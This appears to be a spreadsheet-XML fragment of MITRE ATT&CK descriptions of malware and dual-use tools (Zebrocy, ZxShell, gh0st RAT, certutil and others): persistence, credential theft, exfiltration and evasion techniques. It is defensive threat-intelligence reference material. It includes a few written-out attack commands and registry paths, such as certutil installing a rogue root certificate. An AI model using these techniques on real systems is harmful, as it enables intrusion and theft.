    <t>[Zebrocy](https://attack.mitre.org/software/S0251) scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) decodes its secondary payload and writes it to the victim’s machine. [Zebrocy](https://attack.mitre.org/software/S0251) also uses AES and XOR to decrypt strings and payloads.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) has exfiltrated data to the designated C2 server using HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to delete files and directories.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. [Zebrocy](https://attack.mitre.org/software/S0251) also runs the &lt;code&gt;echo %APPDATA%&lt;/code&gt; command to list the contents of the directory.(Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019) [Zebrocy](https://attack.mitre.org/software/S0251) can obtain the current execution path as well as perform drive enumeration.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) stores all collected information in a single file before exfiltration.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) performs persistence with a logon script via adding to the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses SMTP and POP3 for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) identifies network drives when they are added to victim systems.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) enumerates information about connected storage devices.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses the &lt;code&gt;tasklist&lt;/code&gt; and &lt;code&gt;wmic process get Capture, ExecutablePath&lt;/code&gt; commands to gather the processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) executes the &lt;code&gt;reg query&lt;/code&gt; command to obtain information in the Registry.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) creates an entry in a Registry Run key for the malware to execute on startup.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to create a scheduled task for persistence.(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>A variant of [Zebrocy](https://attack.mitre.org/software/S0251) captures screenshots of the victim’s machine in JPEG and BMP format.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251)'s Delphi variant was packed with UPX.(Citation: Unit42 Sofacy Dec 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) collects the OS version, computer name and serial number for the storage volume C:\. [Zebrocy](https://attack.mitre.org/software/S0251) also runs the &lt;code&gt;systeminfo&lt;/code&gt; command to gather system information. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) runs the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses &lt;code&gt;netstat -aon&lt;/code&gt; to gather network connection information.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gets the username from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gathers the current time zone and date information from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses HTTP for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses cmd.exe to execute commands on the system.(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>One variant of [Zebrocy](https://attack.mitre.org/software/S0251) uses WMI queries to gather information.(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has obfuscated DLLs and functions using dummy API calls inserted between real instructions.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Many [ZeroT](https://attack.mitre.org/software/S0230) samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used DLL side-loading to load malicious payloads.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) shellcode decrypts and decompresses its RC4-encrypted payload.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can download additional payloads onto the victim.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has encrypted its payload with RC4.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Some [ZeroT](https://attack.mitre.org/software/S0230) DLL files have been packed with UPX.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit (LSB) steganography.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used RC4 to encrypt C2 traffic.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's IP address and domain information, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used HTTP for C2.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can add a new service to ensure [PlugX](https://attack.mitre.org/software/S0013) persists on the system when delivered as another payload onto the system.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Some variants of the [Zeroaccess](https://attack.mitre.org/software/S0027) Trojan have been known to store data in Extended Attributes.(Citation: Ciubotariu 2014)</t>
  </si>
  <si>
    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode rootkit.(Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can hook GetClipboardData function to watch for clipboard pastes to collect.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can launch remote scripts on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) hooks processes by leveraging its own IAT hooked functions.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) decrypts strings in the code during the execution process.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) has a command to delete a file. It also can uninstall scripts and delete files to cover its track.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) searches for specific directories on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can download additional malware plug-in modules and execute them on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) modifies several Registry keys under &lt;code&gt;HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\&lt;/code&gt; to disable phishing filters.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) encrypts strings with XOR and obfuscates the macro code from the initial payload. [Zeus Panda](https://attack.mitre.org/software/S0330) also encrypts all configuration and settings in AES and RC4.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks processes on the system and if they meet the necessary requirements, it injects into that process.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses PowerShell to download and execute the payload.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for running processes on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for the existence of a Registry key and if it contains certain values.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) adds persistence by creating Registry Run keys.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can take screenshots of the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) collects the current system time (UTC) and sends it back to the C2 server.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses HTTP for C2 communications.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can launch an interface where it can execute several commands on the victim’s PC.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to clear system event logs.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command called RunAs, which creates a new process as another user or process context.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) hooks several API functions to spawn system threads.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can disable the firewall by modifying the registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile&lt;/code&gt;.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can kill AV products' processes.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) is injected into a shared SVCHOST process.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to perform SYN flood attack on a host.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can delete files from the system.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used FTP for C2 connections.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to open a file manager and explorer on the system.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to transfer files from a remote host.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to capture a remote computer's keystrokes using a keylogger.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) has a feature to create local user accounts.(Citation: Talos ZxShell Oct 2014 )</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can launch port scans.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command, ps, to obtain a listing of processes on the system.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can set up an HTTP or SOCKS proxy.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can query the netsvc group value data located in the svchost group Registry key.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has remote desktop functionality.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used rundll32.exe to execute other DLLs and named pipes.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can capture screenshots.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the local hostname, operating system details, CPU speed, and total physical memory.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the owner and organization information from the target workstation.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can check the services on the system.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) supports functionality for VNC sessions.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to perform video device spying.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used HTTP for C2 connections.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can launch a reverse command shell.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )(Citation: Secureworks BRONZEUNION Feb 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can create a new service using the service parser function ProcessScCommand.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) contains a copy of the OpenSSL library to encrypt C2 traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can run a copy of cmd.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can use a WMI script to achieve persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) can be used to schedule a task on a system.(Citation: TechNet At)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has added itself to the Registry Run key as "NVIDIA" to appear legitimate.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to use the &lt;code&gt;WinExec&lt;/code&gt; API to execute malware on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to add itself to the Registry Run key for persistence.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to detect if the infected host is running an anti-virus process.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) can extract malware from a downloaded JPEG.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to send system volume information to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) has been used to decode binaries hidden inside certificate files as Base64 information.(Citation: Malwarebytes Targeted Attack against Saudi Arabia)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) can be used to download files from a given URL.(Citation: TechNet Certutil)(Citation: LOLBAS Certutil)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: &lt;code&gt;certutil -addstore -f -user ROOT ProgramData\cert512121.der&lt;/code&gt;.(Citation: Palo Alto Retefe)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to delete files from the file system.(Citation: TechNet Del)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find files and directories with native functionality such as &lt;code&gt;dir&lt;/code&gt; commands.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected external system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected internal system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find information about the operating system.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is used to execute programs and other actions at the command-line interface.(Citation: TechNet Cmd)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list the directories on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to download files to the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list running processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to detect anti-virus products and processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to gather information on installed applications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to base64 encode C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to AES encrypt C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the system volume information of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the MAC address of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on user accounts within a domain.(Citation: TechNet Dsquery)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on permission groups within a domain.(Citation: TechNet Dsquery)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on domain trusts with &lt;code&gt;dsquery * -filter "(objectClass=trustedDomain)" -attr *&lt;/code&gt;.(Citation: Harmj0y Domain Trusts)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files to/from a given URL.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files to/from a remote share.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can use Volume Shadow Copy to copy locked files such as ntds.dit.(Citation: LOLBAS Esentutl)(Citation: Cary Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to read and write alternate data streams.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to wipe event logs.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to open a remote shell to execute commands.(Citation: FireEye Hacking Team)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used DLL side-loading.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has decrypted and loaded the [gh0st RAT](https://attack.mitre.org/software/S0032) DLL into memory, once the initial dropper executable is launched.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has encrypted TCP communications to evade detection.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to to delete files.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can download files to the victim’s machine.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has a keylogger.(Citation: Alintanahin 2014)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has altered the InstallTime subkey.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used the InterlockedExchange, SeShutdownPrivilege, and ExitWindowsEx Windows API functions.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used an encrypted protocol within TCP segments to communicate with the C2.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to list processes.(Citation: FireEye Hacking Team)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can inject malicious code into process created by the “Command_Create&amp;Inject” function.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has checked for the existence of a Service key to determine if it has already been installed on the system.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has added a Registry Run key to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used rundll32 for execution.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can capture the victim’s screen remotely.(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can execute its service if the Service key exists. If the key does not exist, [gh0st RAT](https://attack.mitre.org/software/S0032) will create and run the service.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can load DLLs into memory.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used Zlib to compress C2 communications data before encrypting it.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) uses RC4 and XOR to encrypt C2 traffic.(Citation: Nccgroup Gh0st April 2018)</t>
